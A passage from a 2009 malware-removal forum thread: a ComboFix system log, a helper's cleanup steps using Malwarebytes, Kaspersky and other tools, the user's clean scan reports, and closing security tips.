"ctfmon.exe"="c:\windows\system32\ctfmon.exe" [2008-04-14 15360]
"updateMgr"="c:\program files\Adobe\Acrobat 7.0\Reader\AdobeUpdateManager.exe" [2006-03-30 313472]
"Trackstick Manager.exe"="c:\program files\Trackstick Manager\Trackstick Manager.EXE" [2009-04-01 2809856]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"avast!"="c:\progra~1\ALWILS~1\Avast4\ashDisp.exe" [2009-02-05 81000]
"SunJavaUpdateSched"="c:\program files\Java\jre6\bin\jusched.exe" [2009-06-24 148888]
"TPSMain"="TPSMain.exe" - c:\windows\system32\TPSMain.exe [2003-11-20 278528]
"AGRSMMSG"="AGRSMMSG.exe" - c:\windows\agrsmmsg.exe [2003-04-18 88363]
"TFNF5"="TFNF5.exe" - c:\windows\system32\TFNF5.exe [2003-10-16 73728]

c:\documents and settings\All Users\Start Menu\Programs\Startup\
00THotkey.exe [2003-4-15 258048]
Belkin N Wireless USB Adapter Client Utility.lnk - c:\program files\Belkin\F5D8053\v5\Belkinwcui.exe [2009-5-7 1605632]
RAMASST.lnk - c:\windows\system32\RAMASST.exe [2003-11-20 155648]

[HKEY_USERS\.default\software\microsoft\windows\currentversion\policies\explorer]
"NoSetActiveDesktop"= 1 (0x1)
"NoActiveDesktopChanges"= 1 (0x1)

[HKLM\~\startupfolder\C:^Documents and Settings^John B^Start Menu^Programs^Startup^Registration Silent Hunter III.LNK]
path=c:\documents and settings\John B\Start Menu\Programs\Startup\Registration Silent Hunter III.LNK
backup=c:\windows\pss\Registration Silent Hunter III.LNKStartup

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run-disabled]
"Microsoft Works Update Detection"=c:\program files\Common Files\Microsoft Shared\Works Shared\WkUFind.exe
"hpbdfawep"=c:\program files\HP\Dfawep\bin\hpbdfawep.exe 1
"ArcSoft Connection Service"=c:\program files\Common Files\ArcSoft\Connection Service\Bin\ACDaemon.exe
"TouchED"=c:\program files\TOSHIBA\TouchED\TouchED.Exe
"Apoint"=c:\program files\Apoint2K\Apoint.exe

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"c:\\Program Files\\Smart PC Solutions\\Startup Booster\\StartupBooster.exe"=

R0 BsStor;B.H.A Storage Helper Driver;c:\windows\system32\drivers\BsStor.sys [11/20/2003 8:52 PM 9344]
R1 aswSP;avast! Self Protection;c:\windows\system32\drivers\aswSP.sys [5/6/2009 11:01 AM 114768]
R2 aswFsBlk;aswFsBlk;c:\windows\system32\drivers\aswFsBlk.sys [5/6/2009 11:01 AM 20560]
R2 EAPPkt;Realtek EAPPkt Protocol;c:\windows\system32\drivers\EAPPkt.sys [5/7/2009 12:13 PM 38144]
R4 BsUDF;B.H.A UDF Filesystem;c:\windows\system32\drivers\BsUDF.sys [11/20/2003 8:52 PM 390400]
S2 gupdate1c9a0d0dfd66502;Google Update Service (gupdate1c9a0d0dfd66502);c:\program files\Google\Update\GoogleUpdate.exe [3/9/2009 11:05 AM 133104]
S2 mrtRate;mrtRate; [x]
S3 APL531;CRS Photo Scanner;c:\windows\system32\drivers\ov550i.sys [1/28/2008 8:53 AM 580992]
S3 GWIOPM;gwiopm;c:\program files\LEA Digital Recorder\gwiopm.sys [6/16/2003 10:15 AM 3904]
S3 NPF;NetGroup Packet Filter Driver;c:\windows\system32\drivers\npf.sys [11/6/2007 3:22 PM 34064]
S3 rt2870;Ralink 802.11n USB Wireless LAN Card Driver;c:\windows\system32\drivers\rt2870.sys [3/13/2007 4:35 AM 476416]
S3 RTL8187B;TRENDnet TEW-424UB Wireless 802.11g 54Mbps USB 2.0 Network Adapter;c:\windows\system32\DRIVERS\RTL8187B.sys --> c:\windows\system32\DRIVERS\RTL8187B.sys [?]
S3 SUSTUCAM;Susteen USB Cable Modem Driver;c:\windows\system32\drivers\sustucam.sys [4/12/2006 2:01 PM 38016]
S3 WlanUIB;NETGEAR 802.11b USB Driver;c:\windows\system32\drivers\MA111nd5.sys [3/3/2004 4:27 PM 666624]
.
Contents of the 'Scheduled Tasks' folder

2009-07-15 c:\windows\Tasks\AppleSoftwareUpdate.job
- c:\program files\Apple Software Update\SoftwareUpdate.exe [2007-08-29 20:57]

2009-07-20 c:\windows\Tasks\GlaryInitialize.job
- c:\program files\Glary Utilities\initialize.exe [2008-11-17 21:55]

2009-07-20 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files\Google\Update\GoogleUpdate.exe [2009-03-09 16:05]

2009-07-17 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job
- c:\program files\Google\Update\GoogleUpdate.exe [2009-03-09 16:05]
.
.
------- Supplementary Scan -------
.
mStart Page = about:blank
uInternet Connection Wizard,ShellNext = iexplore
uInternet Settings,ProxyOverride = <local>
Trusted Zone: aol.com\free
DPF: {7D731A83-6C80-4EA4-9646-5E06A0513274} - hxxp://www.shockwave.com/content/barnyardinvasion/slgwebinstall.cab
DPF: {87056D28-9730-4A47-B9F9-7E890B62C58A} - hxxp://www.shockwave.com/content/tumblebugs/axhost.cab
FF - ProfilePath - c:\documents and settings\John B\Application Data\Mozilla\Firefox\Profiles\ghtrl0km.default\
FF - prefs.js: browser.startup.homepage - www.yahoo.com
FF - prefs.js: network.proxy.type - 4
FF - plugin: c:\program files\Google\Update\1.2.183.7\npGoogleOneClick8.dll
FF - plugin: c:\program files\Mozilla Firefox\plugins\np-mswmp.dll
FF - plugin: c:\program files\Mozilla Firefox\plugins\npigl.dll
FF - plugin: c:\program files\Mozilla Firefox\plugins\npvirtools.dll
FF - plugin: c:\program files\Unity\WebPlayer\loader\npUnity3D32.dll
FF - plugin: c:\program files\Viewpoint\Viewpoint Experience Technology\npViewpoint.dll
.

**************************************************************************

catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2009-07-20 09:51
Windows 5.1.2600 Service Pack 3 NTFS

scanning hidden processes ...

scanning hidden autostart entries ...

scanning hidden files ...

scan completed successfully
hidden files: 0

**************************************************************************
.
--------------------- LOCKED REGISTRY KEYS ---------------------

[HKEY_USERS\S-1-5-21-3966931221-871848139-187226989-1006\Software\Microsoft\SystemCertificates\AddressBook*]
@Allowed: (Read) (RestrictedCode)
@Allowed: (Read) (RestrictedCode)
.
--------------------- DLLs Loaded Under Running Processes ---------------------

- - - - - - - > 'explorer.exe'(348)
c:\program files\Common Files\Microsoft Shared\Ink\PENUSA.DLL
c:\windows\system32\WPDShServiceObj.dll
c:\program files\ArcSoft\Software Suite\PhotoImpression\share\pihook.dll
c:\windows\system32\we.dll
c:\windows\system32\TPwrCfg.DLL
c:\windows\system32\TPwrReg.dll
c:\windows\system32\TPSTrace.DLL
c:\windows\system32\PortableDeviceTypes.dll
c:\windows\system32\PortableDeviceApi.dll
.
------------------------ Other Running Processes ------------------------
.
c:\program files\Alwil Software\Avast4\aswUpdSv.exe
c:\program files\Alwil Software\Avast4\ashServ.exe
c:\program files\Common Files\ArcSoft\Connection Service\Bin\ACService.exe
c:\windows\system32\drivers\CDAC11BA.EXE
c:\program files\Toshiba\ConfigFree\CFSvcs.exe
c:\windows\system32\DVDRAMSV.exe
c:\program files\Java\jre6\bin\jqs.exe
c:\program files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
c:\windows\system32\HPZipm12.exe
c:\program files\Analog Devices\SoundMAX\SMAgent.exe
c:\program files\Canon\CAL\CALMAIN.exe
c:\windows\system32\spool\drivers\w32x86\3\HP1006MC.EXE
c:\windows\system32\TPSBattM.exe
c:\documents and settings\All Users\Start Menu\Programs\Startup\00THotkey.exe
c:\windows\system32\wscntfy.exe
.
**************************************************************************
.
Completion time: 2009-07-20 10:11 - machine was rebooted
ComboFix-quarantined-files.txt 2009-07-20 15:11

Pre-Run: 9,063,346,176 bytes free
Post-Run: 8,943,685,632 bytes free

Current=4 Default=4 Failed=3 LastKnownGood=5 Sets=1,2,3,4,5
387 --- E O F --- 2009-07-15 17:53
  • 0

#43
Transience
Posted 20 July 2009 - 10:09 AM

Transience

    Unofficial Music Guru

  • Retired Staff
  • 2,448 posts
Just a final check and then you should be good to go.

First we'll clean out your unnecessary temp files to speed up the scans:

1. TFC
  • Please download TFC to your desktop.
  • Save any work, then close all open windows.
  • Double-click TFC to run it, and allow the program to complete its run, which should not take more than a couple minutes.
  • You may or may not be prompted to reboot, if you are click "Yes" and allow the computer to reboot.
  • Close TFC when it has completed.
2. Malwarebytes' Anti-Malware

Please download Malwarebytes' Anti-Malware from here.

Doubleclick mbam-setup.exe to install the program.
  • Make sure a checkmark is placed next to Update Malwarebytes' Anti-Malware and Launch Malwarebytes' Anti-Malware at the end of setup, then click Finish.
  • If an update is found, it will download and install the latest version.
  • Once the program has loaded, select Perform Full Scan, then click Scan.
  • The scan is different from the quick scan and will take a fairly long time to finish (you can leave it to run and go do something else), please be patient.
  • When the scan is complete, click OK, then Show Results to view the results.
  • Make sure that everything is checked, and click Remove Selected.
  • When disinfection is completed, a log will open in Notepad and you may be prompted to restart.
  • The log is automatically saved by MBAM and can be viewed by clicking the Logs tab.
  • Copy & Paste the entire report in your next reply.
3. Kaspersky Online Scan

Kaspersky online scanner uses Java technology to perform the scan. Because your Java is out of date, we need to update it first so that the scan will run without issues.

Update Java

Please download JavaRa to your desktop and unzip it to its own folder
  • Run JavaRa.exe, pick the language of your choice and click Select. Then click Remove Older Versions.
  • Accept any prompts. A log will appear (JavaRa.log), DO NOT post this log, I have no need for it.
  • Open JavaRa.exe again and select Search For Updates.
  • Select Update Using Sun Java's Website then click Search and click on the Open Webpage button. Download and install the latest Java Runtime Environment (JRE) version for your computer.
Scan
  • Follow this link to the Kaspersky WebScanner
  • Read through the requirements and privacy statement and click on Accept button.
  • It will start downloading and installing the scanner and virus definitions. You will be prompted to install an application from Kaspersky. Click Run.
  • When the downloads have finished, click on Settings.
  • Make sure the following is checked.
    • Spyware, Adware, Dialers, and other potentially dangerous programs
      Archives
      Mail databases
  • Click on My Computer under Scan.
  • Once the scan is complete, it will display the results. Click on View Scan Report.
  • You will see a list of infected items there. Click on Save Report As....
  • Save this report to a convenient place. Change the Files of type to Text file (.txt) before clicking on the Save button.
  • Please post this log in your next reply.
So post back with the logs from MBAM and Kaspersky when you have them and give me an update on how the PC is running, and we should have you on your way :).

- Dave
  • 0

#44
Aoc
Posted 21 July 2009 - 07:48 AM

Aoc

    Member

  • Topic Starter
  • Member
  • PipPip
  • 36 posts
Avast found virus on reboot after TFC

gUninst.exe, moved to vault.





Malwarebytes' Anti-Malware 1.39
Database version: 2421
Windows 5.1.2600 Service Pack 3

7/20/2009 11:48:15 AM
mbam-log-2009-07-20 (11-48-15).txt

Scan type: Quick Scan
Objects scanned: 100205
Time elapsed: 11 minute(s), 4 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 0
Registry Values Infected: 0
Registry Data Items Infected: 0
Folders Infected: 0
Files Infected: 0

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
(No malicious items detected)

Registry Values Infected:
(No malicious items detected)

Registry Data Items Infected:
(No malicious items detected)

Folders Infected:
(No malicious items detected)

Files Infected:
(No malicious items detected)



--------------------------------------------------------------------------------
KASPERSKY ONLINE SCANNER 7.0 REPORT
Tuesday, July 21, 2009
Operating System: Microsoft Windows XP Home Edition Service Pack 3 (build 2600)
Kaspersky Online Scanner version: 7.0.26.13
Program database last update: Monday, July 20, 2009 20:28:43
Records in database: 2501463
--------------------------------------------------------------------------------

Scan settings:
Scan using the following database: extended
Scan archives: yes
Scan mail databases: yes

Scan area - My Computer:
C:\
D:\

Scan statistics:
Files scanned: 88590
Threat name: 4
Infected objects: 4
Suspicious objects: 4
Duration of the scan: 02:41:36


File name / Threat name / Threats count
C:\Documents and Settings\John B\Application Data\Thunderbird\Profiles\qhyabnx5.default\Mail\Local Folders\Inbox Suspicious: Trojan-Spy.HTML.Fraud.gen 4
C:\QooBox\Quarantine\C\WINDOWS\Installer\596ea64.msi.vir Infected: Trojan.Win32.Crot.a 1
C:\QooBox\Quarantine\[4]-Submit_2009-07-20_09.37.07.zip Infected: not-a-virus:AdWare.Win32.Virtumonde.rnh 1
C:\QooBox\Quarantine\[4]-Submit_2009-07-20_09.37.07.zip Infected: not-a-virus:PSWTool.Win32.Cain.284 2

The selected area was scanned.



Things seem to be running pretty good at this time.
  • 0

#45
Transience
Posted 21 July 2009 - 10:10 AM

Transience

    Unofficial Music Guru

  • Retired Staff
  • 2,448 posts
Logs look fine, those Kaspersky detections are already in quarantine and harmless.

We have a couple last things to take care of and then you're good to go.

Uninstall ComboFix and its traces from your computer
  • Click on Start > Run
  • Type Combofix /u in the run box and click Ok. Note the space between the x and the /u, it needs to be there.
    Posted Image
Over the course of the fix you've used a variety of special tools to help with the cleaning process - none of these are of any use to you now that you're clean, and it's best not to have them hanging around on your computer. OTCleanIt is a small program that removes all the leftover tools and logs from cleanup of malware.

Remove the tools we used
  • Download OTC to your desktop and run it
  • Click Yes to beginning the Cleanup process and remove these components, including this application.
  • You will be asked to reboot the machine to finish the Cleanup process. Choose Yes.
Here are some tips to reduce the potential for malware infection in the future; I strongly that you read them and take them to heart so that you don't have to endure the process of cleaning your computer again.

Make proper use of your antivirus and firewall
Antivirus and Firewall programs are integral to your computer security. However, just having them installed isn't enough. The definitions of these programs are frequently updated to detect the latest malware, and if you don't keep up with these updates then you'll be vulnerable to infection. Many antivirus and firewall programs have automatic update features, make use of those if you can. If your program doesn't, then get in the habit of routinely performing manual updates, because it's important.

You should keep your antivirus and firewall guard enabled at all times, don't shut them off unless there's a specific reason to do so. Also, regularly performing a full system scan with your antivirus program is a good idea to make sure nothing has slipped through your protection. Once a week works well for many people. You can set the scan to run during a time when you don't plan to use the computer and just leave it to complete on its own.

If you don't have a firewall, here are some excellent free options you can test out: Online Armor, Outpost, and ZoneAlarm. I'd highly recommend that you install one of those. If you do decide to use a 3rd party firewall program, please be sure to disable the Windows firewall as per these instructions so they don't conflict:
  • Please click on Start -> Control Panel
  • Double click Windows Firewall
  • Click Change Settings
  • Choose Off to disable Windows Firewall.
Finally, for a great tutorial on how to get the best protection out of your firewall, visit this link.

Use a safer web browser
Internet Explorer is not the most secure tool for browsing the web. It has been known to be very susceptible to infection, and there are a couple good free alternatives: Firefox and Opera. Both are excellent faster, safer, more powerful and functional free alternatives to Internet Explorer. It's definitely worth the short period of adjustment to start using one of these. If you wish to continue using Internet Explorer, it would be a good idea to follow the tutorial here which will help you to make IE much safer.

If you decide to use Firefox, a couple add-ons that will nicely help to enhance your security are:

McAfee SiteAdvisor: A great firefox add-on that puts McAfee's database of tested sites at your fingertips so you can know whether or not that link you're about to click is safe.
NoScript - This add-on helps to block malicious scripts and in general gives you much better control over what types of things webpages can do to your computer while you're browsing.

Be careful
Having security programs installed is very helpful to you, but none of them have the gift of human thought. The best way to make sure you don't get infected is to exercise common sense. Be careful of what websites you visit - if a site looks suspicious, trust your instincts and get out of there. Be careful of what attachments you open in emails and files you download from websites - check them over carefully and look at the file extensions to make sure that you know what you're getting. Using peer-to-peer file sharing programs or downloading cracks and keygens is something else to avoid - the files you will be downloading are infected in a vast majority of cases, and the benefits simply aren't worth the risk to your computer.

Keep up on Windows updates
Along with keeping all of the security programs that you choose to use updated, it is also important to keep up on system updates from Microsoft, as these patch critical security vulnerabilities and help to keep you safe. Typically the windows update icon will appear in your taskbar when new updates are available, whenever you see it you should open the menu up and install the updates that are available. Although it may be an annoyance, that little bit of extra time it takes to stay updated is very well worth it instead of getting infected from an exploit and having to clean your PC again.

Slow computer?
If your computer begins to slow down again in the future for no particular reason, your first step should not be to come back to the malware forum. As your computer ages and is used, its parts wear, files and programs accumulate, and its performance can decrease. To restore your computer's performance to its best possible level, follow the steps in this page written by malware expert Miekiemoes.

I'll leave this thread open for a couple days in case you come across any lingering problems that need fixing, then I'll close it up. If you need it reopened for any reason just shoot me a PM. It's been a pleasure working with you, now best of luck!

Cheers,
Dave
  • 0
Back to Virus, Spyware, Malware Removal · Next Unread Topic →




Similar Topics

1 user(s) are reading this topic

0 members, 1 guests, 0 anonymous users

  1. Geeks to Go Community
  2. Security
  3. Virus, Spyware, Malware Removal

As Featured On:

Microsoft Yahoo BBC MSN PC Magazine Washington Post HP